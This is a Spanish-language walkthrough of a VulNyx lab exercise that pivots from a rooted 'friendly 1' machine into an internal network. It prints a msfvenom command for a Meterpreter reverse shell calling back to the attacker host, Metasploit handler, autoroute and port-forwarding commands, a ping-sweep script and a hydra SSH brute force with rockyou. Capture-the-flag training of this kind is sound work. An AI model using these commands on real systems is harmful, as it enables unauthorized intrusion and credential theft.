Usaremos la máquina friendly 1 intermedia y la máquina basic de vulnyx máquina final:
Procedemos con la intrusión en la máquina friendly 1 hasta ser usuario root:
Ahora vamos a recibir esta conexión como meterpreter en la máquina atacante, por lo que creamos un nuevo payload con msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=4444 -f elf -b '\x00\x0a\x0d' -o virus
Y nos lo compartimos con la máquina víctima:
Y usamos el multi/handler de metasploit cargando el payload de meterpreter:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Y recibimos el meterpreter:
Vemos las interfaces de red con el comando ipconfig, donde identificamos la segunda interfaz de red:
Enrutamos el tráfico con el módulo de autoroute:
use /multi/manage/autoroute
Y ahora tenemos que encontrar equipos levantados dentro de esta red interna de 10.10.10.0/24, por lo que usamos el siguiente script:
#!/bin/bash for i in {1..255}; do timeout 1 bash -c "ping -c 1 10.10.10.$i" >/dev/null if [ $? -eq 0 ]; then echo "El host 10.10.10.$i está activo" fi done
Lo compartimos:
Lo recibimos:
Y encontramos el host objetivo:
Ahora tenemos que hacerle un escaneo de puertos a esta dirección IP, por lo que usamos el módulo de portscan/tcp:
Y con los siguientes comandos realizamos el port forwarding, de tal forma que nos vamos a traer tanto el puerto 22 como el puerto 631:
portfwd add -l 222 -p 22 -r 10.10.10.8 portfwd add -l 631 -p 631 -r 10.10.10.8
Y aquí vemos el contenido de lo que corre por el puerto 631:
Detectamos el usuario:
Por lo que atacamos al puerto ssh que también nos hemos traído en el puerto 222 de mi máquina local:
hydra -l dimitri -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 -s 222















